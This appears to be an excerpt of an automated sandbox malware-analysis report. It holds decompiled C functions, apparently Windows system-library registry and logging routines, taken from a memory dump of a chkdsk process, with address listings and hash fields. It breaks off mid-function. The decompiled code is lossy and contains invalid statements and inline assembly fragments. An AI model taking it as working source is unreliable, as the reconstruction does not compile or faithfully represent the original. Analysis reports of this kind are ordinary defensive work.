                                                      Uniqueness Score: -1.00%

                                                      Function 04DB03E2 Relevance: .3, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 74%
                                                      			E04DB03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x4e7d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E04DB0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E04DCB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E04D9B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x4e77c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E04DA7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E04DA7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E04E07016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E04DC9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E04E069A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x4e77c04 != 0) {
						_t118 = _v12;
						_t120 = E04E0A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x4e77bd8;
						if( *0x4e77bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E04DC95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E04DC99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E04E03540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E04D8B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E04DCAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x4e78474 - 3;
										if( *0x4e78474 != 3) {
											 *0x4e779dc =  *0x4e779dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E04DA7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E04DA7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E04E07016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x4e78708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x4e77b00; // 0x0
							asm("ror esi, cl");
							 *0x4e7b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E04DC95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E04D97F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                      0x04db03f1
                                                      0x04db03f7
                                                      0x04db03f9
                                                      0x04db03fb
                                                      0x04db03fd
                                                      0x04db0400
                                                      0x04db040a
                                                      0x04df4c7a
                                                      0x04db0537
                                                      0x04db0547
                                                      0x04db0410
                                                      0x04db0410
                                                      0x04db0414
                                                      0x04db0417
                                                      0x04db041a
                                                      0x04db0421
                                                      0x04db0424
                                                      0x04db042b
                                                      0x04db043b
                                                      0x04db043e
                                                      0x04db043f
                                                      0x04db043f
                                                      0x04db0446
                                                      0x04db0449
                                                      0x04db044c
                                                      0x04db044f
                                                      0x04db0459
                                                      0x04df4c8d
                                                      0x04db045f
                                                      0x04db045f
                                                      0x04db045f
                                                      0x04db0467
                                                      0x04df4c97
                                                      0x04df4c9d
                                                      0x04df4ca4
                                                      0x04df4caa
                                                      0x04df4caf
                                                      0x04df4cb1
                                                      0x04df4cc3
                                                      0x04df4cb3
                                                      0x04df4cbc
                                                      0x04df4cbc
                                                      0x04df4cc8
                                                      0x04df4ccb
                                                      0x04df4cd7
                                                      0x04df4cda
                                                      0x04df4cdf
                                                      0x04df4cdf
                                                      0x04df4ccb
                                                      0x04df4ca4
                                                      0x04db046d
                                                      0x04db046f
                                                      0x04db046f
                                                      0x04db0471
                                                      0x04db0476
                                                      0x04db047a
                                                      0x04db047b
                                                      0x04db0483
                                                      0x04db0489
                                                      0x04db048d
                                                      0x00000000
                                                      0x00000000
                                                      0x04df4ce9
                                                      0x04df4cef
                                                      0x04df4d22
                                                      0x04df4d22
                                                      0x00000000
                                                      0x04df4d22
                                                      0x04df4cf1
                                                      0x04df4cf7
                                                      0x00000000
                                                      0x00000000
                                                      0x04df4cf9
                                                      0x04df4cff
                                                      0x00000000
                                                      0x00000000
                                                      0x04df4d05
                                                      0x04df4d07
                                                      0x00000000
                                                      0x00000000
                                                      0x04df4d0d
                                                      0x04df4d0f
                                                      0x04df4d14
                                                      0x04df4d16
                                                      0x00000000
                                                      0x00000000
                                                      0x04df4d1c
                                                      0x04df4d1c
                                                      0x04db0499
                                                      0x04db0535
                                                      0x04db0535
                                                      0x00000000
                                                      0x04db0535
                                                      0x04db04a6
                                                      0x04df4d2c
                                                      0x04df4d37
                                                      0x04df4d39
                                                      0x04df4d3b
                                                      0x00000000
                                                      0x00000000
                                                      0x04df4d41
                                                      0x04df4d48
                                                      0x04db0527
                                                      0x04db052b
                                                      0x04db052d
                                                      0x04db0530
                                                      0x04db0530
                                                      0x00000000
                                                      0x04db052b
                                                      0x04df4d4e
                                                      0x04db04ac
                                                      0x04db04ac
                                                      0x04db04af
                                                      0x04db04b2
                                                      0x04db04b7
                                                      0x04db04b9
                                                      0x04db04bb
                                                      0x04db04bd
                                                      0x04db04bf
                                                      0x04db04c5
                                                      0x04db04c9
                                                      0x04df4d53
                                                      0x04df4d59
                                                      0x04df4db9
                                                      0x04df4dba
                                                      0x04df4dbf
                                                      0x04df4dc2
                                                      0x04df4dc4
                                                      0x04df4dc7
                                                      0x04df4dce
                                                      0x00000000
                                                      0x04df4dce
                                                      0x04df4d5b
                                                      0x04df4d61
                                                      0x00000000
                                                      0x00000000
                                                      0x04df4d63
                                                      0x04df4d69
                                                      0x00000000
                                                      0x00000000
                                                      0x04df4d6b
                                                      0x04df4d6e
                                                      0x04df4d74
                                                      0x04df4d76
                                                      0x04df4d7c
                                                      0x04df4d7e
                                                      0x04df4d84
                                                      0x04df4d89
                                                      0x04df4d8c
                                                      0x04df4d8d
                                                      0x04df4d92
                                                      0x04df4d95
                                                      0x04df4d96
                                                      0x04df4d98
                                                      0x04df4d9a
                                                      0x04df4d9f
                                                      0x04df4da4
                                                      0x04df4da6
                                                      0x04df4da8
                                                      0x04df4daf
                                                      0x04df4db1
                                                      0x04df4db1
                                                      0x04df4daf
                                                      0x04df4da6
                                                      0x04df4d84
                                                      0x04df4d7c
                                                      0x00000000
                                                      0x04df4d74
                                                      0x04db04d6
                                                      0x04df4de1
                                                      0x04db04dc
                                                      0x04db04dc
                                                      0x04db04dc
                                                      0x04db04e4
                                                      0x04df4deb
                                                      0x04df4df1
                                                      0x04df4df8
                                                      0x04df4dfe
                                                      0x04df4e03
                                                      0x04df4e05
                                                      0x04df4e17
                                                      0x04df4e07
                                                      0x04df4e10
                                                      0x04df4e10
                                                      0x04df4e1c
                                                      0x04df4e1f
                                                      0x04df4e35
                                                      0x04df4e35
                                                      0x04df4e1f
                                                      0x04df4df8
                                                      0x04db04f1
                                                      0x04db04fa
                                                      0x04df4e3f
                                                      0x04df4e47
                                                      0x04df4e5b
                                                      0x04df4e61
                                                      0x04df4e67
                                                      0x04df4e69
                                                      0x04df4e71
                                                      0x04df4e73
                                                      0x04db0500
                                                      0x04db0500
                                                      0x04db0500
                                                      0x04db04fa
                                                      0x04db0508
                                                      0x04db051d
                                                      0x04db051d
                                                      0x04db051f
                                                      0x04db0524
                                                      0x00000000
                                                      0x04db0524
                                                      0x04db0515
                                                      0x04db0517
                                                      0x04df4e7a
                                                      0x04df4e7c
                                                      0x00000000
                                                      0x00000000
                                                      0x04df4e85
                                                      0x00000000
                                                      0x04df4e85
                                                      0x00000000
                                                      0x04db0517

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 76a3c2dce6aa29a46249d2d13b76bebfa2b3e695e347b9e287e57cf131f38cf1
                                                      • Instruction ID: ca2db3018ffe31c02a899a26a5bce174b76e7087355d78ea038674fe817cdc55
                                                      • Opcode Fuzzy Hash: 76a3c2dce6aa29a46249d2d13b76bebfa2b3e695e347b9e287e57cf131f38cf1
                                                      • Instruction Fuzzy Hash: F491B631B00255EFEB329A68CC48BAF77A4FB05728F064265EA91A72D1E774BD40C7D1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D8C600 Relevance: .2, Instructions: 225COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 67%
                                                      			E04D8C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x4e7d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E04D96D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E04DCB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x4e77b9c; // 0x0
					_t74 = L04DA4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E04DC9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L04DA77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E04DCF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E04DC13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L04DA77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E04DC9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                      0x04d8c608
                                                      0x04d8c615
                                                      0x04d8c625
                                                      0x04d8c62d
                                                      0x04d8c635
                                                      0x04d8c640
                                                      0x04d8c680
                                                      0x04d8c687
                                                      0x04d8c688
                                                      0x04d8c689
                                                      0x04d8c694
                                                      0x04d8c694
                                                      0x04d8c642
                                                      0x04d8c64a
                                                      0x04d8c697
                                                      0x04df7a25
                                                      0x04df7a2b
                                                      0x04df7a2e
                                                      0x04df7a30
                                                      0x04df7bea
                                                      0x04df7bea
                                                      0x00000000
                                                      0x04df7bea
                                                      0x04df7a36
                                                      0x04df7a43
                                                      0x04df7a48
                                                      0x04df7a4c
                                                      0x04df7a4e
                                                      0x00000000
                                                      0x00000000
                                                      0x04df7a58
                                                      0x04df7a5a
                                                      0x04df7a5b
                                                      0x04df7a5c
                                                      0x04df7a5d
                                                      0x04df7a63
                                                      0x04df7a64
                                                      0x04df7a6a
                                                      0x04df7a6c
                                                      0x04df7a6e
                                                      0x04df79cb
                                                      0x04df79cb
                                                      0x04df79ce
                                                      0x04df79d0
                                                      0x04df7a98
                                                      0x04df7a9b
                                                      0x04df7a9b
                                                      0x04df7a9e
                                                      0x04df7aa1
                                                      0x04df7bbe
                                                      0x04df7bbe
                                                      0x04df7bc0
                                                      0x04df7be0
                                                      0x04df7be0
                                                      0x04df7a01
                                                      0x04df7a01
                                                      0x04df7a05
                                                      0x04df7a07
                                                      0x04df7a15
                                                      0x04df7a15
                                                      0x04df7a1a
                                                      0x00000000
                                                      0x04df7a1a
                                                      0x04df7bc2
                                                      0x04df7bc6
                                                      0x04df7bc9
                                                      0x04df7bcd
                                                      0x04df7bcf
                                                      0x04df79e6
                                                      0x04df79e6
                                                      0x04df79eb
                                                      0x04df79eb
                                                      0x04df79ef
                                                      0x04df79f1
                                                      0x00000000
                                                      0x00000000
                                                      0x04df79f3
                                                      0x04df79f5
                                                      0x04df79ff
                                                      0x04df79ff
                                                      0x00000000
                                                      0x04df79ff
                                                      0x04df79f7
                                                      0x04df79fd
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04df79fd
                                                      0x04df7bd5
                                                      0x04df7bd8
                                                      0x00000000
                                                      0x00000000
                                                      0x04df7ba9
                                                      0x04df7bac
                                                      0x04df7bb0
                                                      0x04df7bb1
                                                      0x04df7bb1
                                                      0x04df7bb6
                                                      0x00000000
                                                      0x04df7bb6
                                                      0x04df7aa7
                                                      0x04df7aaa
                                                      0x00000000
                                                      0x00000000
                                                      0x04df7ab2
                                                      0x04df7ab3
                                                      0x04df7ab5
                                                      0x04df7aec
                                                      0x04df7aef
                                                      0x04df7b25
                                                      0x04df7b28
                                                      0x04df7b62
                                                      0x04df7b64
                                                      0x04df7b8f
                                                      0x04df7b92
                                                      0x04df7b96
                                                      0x04df7b98
                                                      0x00000000
                                                      0x00000000
                                                      0x04df7b9e
                                                      0x04df7b9f
                                                      0x04df7ba3
                                                      0x00000000
                                                      0x04df7ba3
                                                      0x04df7b66
                                                      0x04df7b68
                                                      0x04df7ae2
                                                      0x04df7ae2
                                                      0x00000000
                                                      0x04df7ae2
                                                      0x04df7b6e
                                                      0x04df7b72
                                                      0x04df7b75
                                                      0x04df7b81
                                                      0x04df7b85
                                                      0x04df7b87
                                                      0x00000000
                                                      0x00000000
                                                      0x04df7b31
                                                      0x04df7b34
                                                      0x04df7b3c
                                                      0x04df7b45
                                                      0x04df7b46
                                                      0x04df7b4f
                                                      0x04df7b51
                                                      0x04df7b57
                                                      0x04df7b59
                                                      0x04df7b59
                                                      0x00000000
                                                      0x04df7b59
                                                      0x04df7b77
                                                      0x00000000
                                                      0x04df7b77
                                                      0x04df7b2a
                                                      0x00000000
                                                      0x04df7b2a
                                                      0x04df7af1
                                                      0x04df7af3
                                                      0x00000000
                                                      0x00000000
                                                      0x04df7afb
                                                      0x04df7afc
                                                      0x04df7afe
                                                      0x00000000
                                                      0x00000000
                                                      0x04df7b00
                                                      0x04df7b03
                                                      0x00000000
                                                      0x00000000
                                                      0x04df7b05
                                                      0x04df7b09
                                                      0x04df7b0d
                                                      0x04df7b0f
                                                      0x00000000
                                                      0x00000000
                                                      0x04df7b18
                                                      0x04df7b1d
                                                      0x00000000
                                                      0x04df7b1d
                                                      0x04df7ab7
                                                      0x04df7ab9
                                                      0x00000000
                                                      0x00000000
                                                      0x04df7abf
                                                      0x04df7ac1
                                                      0x00000000
                                                      0x00000000
                                                      0x04df7ac3
                                                      0x04df7ac6
                                                      0x00000000
                                                      0x00000000
                                                      0x04df7ac8
                                                      0x04df7acc
                                                      0x04df7ad0
                                                      0x04df7ad2
                                                      0x00000000
                                                      0x00000000
                                                      0x04df7adb
                                                      0x00000000
                                                      0x04df7adb
                                                      0x04df79d6
                                                      0x04df79d9
                                                      0x04df79dc
                                                      0x04df7a91
                                                      0x04df7a94
                                                      0x00000000
                                                      0x04df7a94
                                                      0x04df79e2
                                                      0x00000000
                                                      0x04df79e2
                                                      0x04df7a74
                                                      0x04df7a7a
                                                      0x00000000
                                                      0x00000000
                                                      0x04df7a8a
                                                      0x04df7a21
                                                      0x04df7a21
                                                      0x00000000
                                                      0x04df7a21
                                                      0x04d8c650
                                                      0x04d8c651
                                                      0x04d8c656
                                                      0x04d8c65c
                                                      0x04d8c65d
                                                      0x04d8c663
                                                      0x04d8c664
                                                      0x04d8c66a
                                                      0x04d8c66e
                                                      0x04df79c5
                                                      0x04df79c7
                                                      0x00000000
                                                      0x04df79c7
                                                      0x04d8c67a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6263b71a4c50f68eb0d5cdd2fd43b3b2221963a8b9844593be69959fc60dfdd1
                                                      • Instruction ID: 2ccccf200cf361920d18c469afa3cb68135d2585aa23043e6f2f81ed19cd60e7
                                                      • Opcode Fuzzy Hash: 6263b71a4c50f68eb0d5cdd2fd43b3b2221963a8b9844593be69959fc60dfdd1
                                                      • Instruction Fuzzy Hash: 228170756542029BDB35CF14CC80ABA73A5FB85754F1A486EEE999B240E330FD41CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E06DC9 Relevance: .2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 79%
                                                      			E04E06DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L04DA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E04E06B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E04DA7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E04DC9AE0();
					_t87 = L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E04E0795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E04E0795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E04E0795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E04E0795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L04DA4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E04E06B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E04E06B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E04E06B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
